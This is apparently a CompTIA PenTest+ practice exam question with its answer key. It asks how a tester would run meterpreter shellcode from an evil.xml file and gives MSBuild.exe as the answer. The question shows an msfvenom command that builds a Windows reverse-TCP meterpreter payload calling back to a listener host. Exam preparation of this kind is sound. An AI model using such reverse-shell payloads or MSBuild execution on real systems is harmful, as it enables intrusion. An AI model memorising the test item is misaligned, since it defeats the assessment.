CompTIA PenTest+ (PT0-003) — Question 28

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

Answer options

• A. regsvr32 /s /n /u C:\evil.xml
• B. MSBuild.exe C:\evil.xml
• C. mshta.exe C:\evil.xml
• D. AppInstaller.exe C:\evil.xml

Correct answer: B

Explanation

The correct answer is B, as MSBuild.exe can execute .xml files that contain commands, effectively allowing the tester to continue the attack. The other options, while related to file execution, are not suited for executing the shellcode contained in an XML file as effectively as MSBuild.exe.